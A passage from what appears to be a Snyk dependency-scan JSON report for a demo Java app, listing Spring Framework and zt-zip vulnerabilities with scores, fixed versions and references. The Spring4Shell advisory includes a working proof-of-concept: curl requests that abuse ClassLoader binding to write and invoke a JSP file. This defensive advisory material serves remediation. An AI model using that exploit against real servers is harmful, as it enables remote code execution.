[Pivotal Security Advisory](https://pivotal.io/security/cve-2022-22950)\n", - "epssDetails": { - "percentile": "0.35300", - "probability": "0.00081", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-22950" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "org.springframework:spring-expression", - "proprietary": false, - "creationTime": "2022-03-29T10:05:31.971026Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-03-29T09:51:43Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-expression" - }, - "publicationTime": "2022-03-29T14:24:08Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:47.044801Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.springframework:spring-web@3.2.6.RELEASE", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-expression@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-web@5.0.0.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-expression", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-3369749", - "title": "Allocation of Resources Without Limits or Throttling", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "Google OSS-Fuzz team" - ], - "semver": { - "vulnerable": [ - "[,5.2.23.RELEASE)", - "[5.3.0,5.3.26)", - "[6.0.0,6.0.7)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.2.23.RELEASE", - "5.3.26", - "6.0.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-expression", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/430fc25acad2e85cbdddcd52b64481691f03ebd1", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/52c93b1c4b24d70de233a958e60e7c5822bd274f", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/935c29e3ddba5b19951e54f6685c70ed45d9cbe5", - "title": "GitHub Commit" - }, - { - "url": "https://spring.io/security/cve-2023-20861", - "title": "Vulnerability Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:53:04.052825Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:54:00.291695Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:22.626014Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:04.052825Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:54:00.291695Z" - } - ], - "description": "## Overview\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via a crafted `SpEL` expression.\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.23.RELEASE, 5.3.26, 6.0.7 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/430fc25acad2e85cbdddcd52b64481691f03ebd1)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/52c93b1c4b24d70de233a958e60e7c5822bd274f)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/935c29e3ddba5b19951e54f6685c70ed45d9cbe5)\n- [Vulnerability Advisory](https://spring.io/security/cve-2023-20861)\n", - "epssDetails": { - "percentile": "0.48906", - "probability": "0.00133", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2023-20861" - ], - "CWE": [ - "CWE-770" - ] - }, - "packageName": "org.springframework:spring-expression", - "proprietary": false, - "creationTime": "2023-03-23T12:26:39.837900Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2023-03-23T11:49:46Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-expression" - }, - "publicationTime": "2023-03-23T12:37:13.052190Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:54:00.291695Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.springframework:spring-web@3.2.6.RELEASE", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-expression@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-web@5.0.0.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-expression", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-5422217", - "title": "Allocation of Resources Without Limits or Throttling", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "Google OSS-Fuzz Team" - ], - "semver": { - "vulnerable": [ - "[,5.2.24.RELEASE)", - "[5.3.0,5.3.27)", - "[6.0.0,6.0.8)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.2.24.RELEASE", - "5.3.27", - "6.0.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 6.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-expression", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/965a6392757d20f9db19241126fcc719a51eac15", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/b73f5fcac22555f844cf27a7eeb876cb9d7f7f7e", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/ebc82654282bda547fbc20a9749ab1bda886a46f", - "title": "GitHub Commit" - }, - { - "url": "https://spring.io/security/cve-2023-20863", - "title": "Vulnerability Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:53:09.820460Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:15.433654Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:09.820460Z" - } - ], - "description": "## Overview\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling when a user provides a very long `SpEL` expression.\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.24.RELEASE, 5.3.27, 6.0.8 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/965a6392757d20f9db19241126fcc719a51eac15)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/b73f5fcac22555f844cf27a7eeb876cb9d7f7f7e)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/ebc82654282bda547fbc20a9749ab1bda886a46f)\n- [Vulnerability Advisory](https://spring.io/security/cve-2023-20863)\n", - "epssDetails": { - "percentile": "0.70100", - "probability": "0.00306", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2023-20863" - ], - "CWE": [ - "CWE-770" - ] - }, - "packageName": "org.springframework:spring-expression", - "proprietary": false, - "creationTime": "2023-04-14T06:33:20.884492Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2023-04-14T06:25:45Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-expression" - }, - "publicationTime": "2023-04-14T06:33:21.063044Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:09.820460Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.springframework:spring-web@3.2.6.RELEASE", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-expression@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-web@5.0.0.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-expression", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2436751", - "title": "Remote Code Execution", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[ ,5.2.20)", - "[5.3.0, 5.3.18)" - ] - }, - "exploit": "High", - "fixedIn": [ - "5.2.20", - "5.3.18" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [ - { - "version": [ - "[ ,5.2.20)", - "[5.3.0, 5.3.18)" - ], - "functionId": { - "filePath": "org/springframework/beans/CachedIntrospectionResults.java", - "className": "CachedIntrospectionResults", - "functionName": "" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-beans", - "references": [ - { - "url": "https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html", - "title": "CyberKendra Post" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/002546b3e4b8d791ea6acccb81eb3168f51abb15", - "title": "GitHub Commit" - }, - { - "url": "https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/", - "title": "LunaSec Blog" - }, - { - "url": "https://blog.payara.fish/payara-and-spring4shell", - "title": "Payara Blogpost" - }, - { - "url": "https://github.com/CalumHutton/CVE-2022-22965-PoC_Payara", - "title": "Payara PoC" - }, - { - "url": "https://snyk.io/blog/spring4shell-zero-day-rce-spring-framework-explained/", - "title": "Snyk Blog - Technical Breakdown" - }, - { - "url": "https://github.com/Kirill89/CVE-2022-22965-PoC", - "title": "Snyk PoC" - }, - { - "url": "https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement", - "title": "Spring Security Announcement" - }, - { - "url": "https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative", - "title": "Spring Tomcat Mitigation Advice" - }, - { - "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", - "title": "CISA - Known Exploited Vulnerabilities" - }, - { - "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-22965.yaml", - "title": "Nuclei Templates" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:12.628867Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:15.463472Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-30T15:25:03.231650Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:12.628867Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:15.463472Z" - } - ], - "description": "## Overview\n[org.springframework:spring-beans](https://www.baeldung.com/spring-bean) is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.\n\nAffected versions of this package are vulnerable to Remote Code Execution via manipulation of `ClassLoader` that is achievable with a POST HTTP request. This could allow an attacker to execute a webshell on a victim's application (TomCat), or download arbitrary files from the server (Payara/Glassfish).\r\n\r\n**Note:** \r\n* Current public exploits require victim applications to be built with JRE version 9 (or above) and to be deployed on either Tomcat, Payara, or Glassfish. \r\n\r\n* However, we have confirmed that it is technically possible for additional exploits to work under additional application configurations as well. \r\n\r\n* As such, while we recommend users prioritize first remediating against the configuration described above, for full protection, we also recommend upgrading all vulnerable versions to the fixed `spring-beans` version regardless of the application configuration.\r\n\r\n### Update Log \r\n* **31/03/2022 -** Severity was raised from 8.1 to 9.8\r\n* **08/04/2022 -** Advisory was updated to reflect that Snyk's security research team was able to author a working PoC of this vulnerability against applications that are deployed on Payara (which is based on Glassfish). \r\n\r\n\r\n## PoC\r\n```java\r\n1/ docker run -p 8888:8080 --rm --interactive --tty --name vm1 tomcat:9.0\r\n2/ ./mvnw install\r\n3/ docker cp target/handling-form-submission-complete.war vm1:/usr/local/tomcat/webapps\r\n4/ curl -X POST \\\r\n -H \"pre:<%\" \\\r\n -H \"post:;%>\" \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{pre}iSystem.out.println(123)%{post}i' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/handling-form-submission-complete' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.prefix=rce' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=' \\\r\n http://localhost:8888/handling-form-submission-complete/greeting\r\n5/ curl http://localhost:8888/handling-form-submission-complete/rce.jsp\r\n```\n## Remediation\nUpgrade `org.springframework:spring-beans` to version 5.2.20, 5.3.18 or higher.\n## References\n- [CyberKendra Post](https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/002546b3e4b8d791ea6acccb81eb3168f51abb15)\n- [LunaSec Blog](https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/)\n- [Payara Blogpost](https://blog.payara.fish/payara-and-spring4shell)\n- [Payara PoC](https://github.com/CalumHutton/CVE-2022-22965-PoC_Payara)\n- [Snyk Blog - Technical Breakdown](https://snyk.io/blog/spring4shell-zero-day-rce-spring-framework-explained/)\n- [Snyk PoC](https://github.com/Kirill89/CVE-2022-22965-PoC)\n- [Spring Security Announcement](https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement)\n- [Spring Tomcat Mitigation Advice](https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-22965.yaml)\n", - "epssDetails": { - "percentile": "0.99975", - "probability": "0.97485", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-22965" - ], - "CWE": [ - "CWE-94" - ] - }, - "packageName": "org.springframework:spring-beans", - "proprietary": false, - "creationTime": "2022-03-30T21:42:31.436000Z", - "functions_new": [ - { - "version": [ - "[ ,5.2.20)", - "[5.3.0, 5.3.18)" - ], - "functionId": { - "className": "org.springframework.beans.CachedIntrospectionResults", - "functionName": "" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2022-03-30T21:42:24Z", - "exploitDetails": { - "sources": [ - "CISA", - "Nuclei Templates", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Attacked", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-beans" - }, - "publicationTime": "2022-03-30T22:32:44Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:17.474380Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.springframework:spring-web@3.2.6.RELEASE", - "org.springframework:spring-beans@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-web@5.2.20.RELEASE", - "org.springframework:spring-beans@5.2.20.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-beans", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2823313", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "Rob Ryan" - ], - "semver": { - "vulnerable": [ - "[,5.2.22.RELEASE)", - "[5.3.0,5.3.20)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.2.22.RELEASE", - "5.3.20" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-beans", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/50177b1ad3485bd44239b1756f6c14607476fcf2", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/83186b689f11f5e6efe7ccc08fdeb92f66fcd583", - "title": "GitHub Commit" - }, - { - "url": "https://tanzu.vmware.com/security/cve-2022-22970", - "title": "Tanzu vmware" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:47:28.086179Z" - }, - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:49:48.407397Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:21.626910Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:28.086179Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:48.407397Z" - } - ], - "description": "## Overview\n[org.springframework:spring-beans](https://www.baeldung.com/spring-bean) is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) if it relies on data binding to set a `MultipartFile` or `javax.servlet.Part` to a field in a model object.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework:spring-beans` to version 5.2.22.RELEASE, 5.3.20 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/50177b1ad3485bd44239b1756f6c14607476fcf2)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/83186b689f11f5e6efe7ccc08fdeb92f66fcd583)\n- [Tanzu vmware](https://tanzu.vmware.com/security/cve-2022-22970)\n", - "epssDetails": { - "percentile": "0.75300", - "probability": "0.00449", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-22970" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "org.springframework:spring-beans", - "proprietary": false, - "creationTime": "2022-05-12T08:45:35.744127Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-05-12T08:17:10Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-beans" - }, - "publicationTime": "2022-05-12T09:49:10.833602Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:49:48.407397Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.springframework:spring-web@3.2.6.RELEASE", - "org.springframework:spring-beans@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-web@5.2.22.RELEASE", - "org.springframework:spring-beans@5.2.22.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-beans", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634", - "title": "Improper Handling of Case Sensitivity", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,5.2.21)", - "[5.3.0, 5.3.19)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "5.2.21", - "5.3.19" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "low", - "cvssScore": 3.7, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-context", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/833e750175349ab4fd502109a8b41af77e25cdea", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/issues/28333", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/MarcinGadz/spring-rce-poc", - "title": "PoC" - }, - { - "url": "https://spring.io/blog/2022/04/13/spring-framework-data-binding-rules-vulnerability-cve-2022-22968", - "title": "Spring Blog Post" - }, - { - "url": "https://tanzu.vmware.com/security/cve-2022-22968", - "title": "Tanzu Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:47:26.822810Z" - }, - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:49:16.458425Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P", - "assigner": "Snyk", - "severity": "low", - "baseScore": 3.7, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:31.233852Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:26.822810Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:16.458425Z" - } - ], - "description": "## Overview\n\nAffected versions of this package are vulnerable to Improper Handling of Case Sensitivity via the patterns for `disallowedFields` on a `DataBinder`. As a result, a field is not effectively protected unless it is listed with both upper and lower case for the first character of the field, including nested fields within the property path.\n## Remediation\nUpgrade `org.springframework:spring-context` to version 5.2.21, 5.3.19 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/833e750175349ab4fd502109a8b41af77e25cdea)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/28333)\n- [PoC](https://github.com/MarcinGadz/spring-rce-poc)\n- [Spring Blog Post](https://spring.io/blog/2022/04/13/spring-framework-data-binding-rules-vulnerability-cve-2022-22968)\n- [Tanzu Advisory](https://tanzu.vmware.com/security/cve-2022-22968)\n", - "epssDetails": { - "percentile": "0.29205", - "probability": "0.00065", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-22968" - ], - "CWE": [ - "CWE-178" - ] - }, - "packageName": "org.springframework:spring-context", - "proprietary": false, - "creationTime": "2022-04-14T11:54:10.207823Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-04-14T11:43:54Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-context" - }, - "publicationTime": "2022-04-14T12:09:40Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:49:16.458425Z", - "socialTrendAlert": false, - "severityWithCritical": "low", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.springframework:spring-web@3.2.6.RELEASE", - "org.springframework:spring-context@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-web@5.0.0.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-context", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGZEROTURNAROUND-31681", - "title": "Arbitrary File Write via Archive Extraction (Zip Slip)", - "CVSSv3": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", - "credit": [ - "Snyk Security research Team" - ], - "semver": { - "vulnerable": [ - "[,1.13)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "1.13" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.5, - "functions": [ - { - "version": [ - "[,1.13)" - ], - "functionId": { - "filePath": "org/zeroturnaround/zip/ZipUtil$Unpacker.java", - "className": "ZipUtil$Unpacker", - "functionName": "process" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.zeroturnaround:zt-zip", - "references": [ - { - "url": "https://github.com/zeroturnaround/zt-zip/commit/759b72f33bc8f4d69f84f09fcb7f010ad45d6fff", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/snyk/zip-slip-vulnerability", - "title": "Zip Slip Advisory" - }, - { - "url": "https://security.snyk.io/research/zip-slip-vulnerability", - "title": "Zip Slip Advisory" - } - ], - "cvssDetails": [ - { - "assigner": 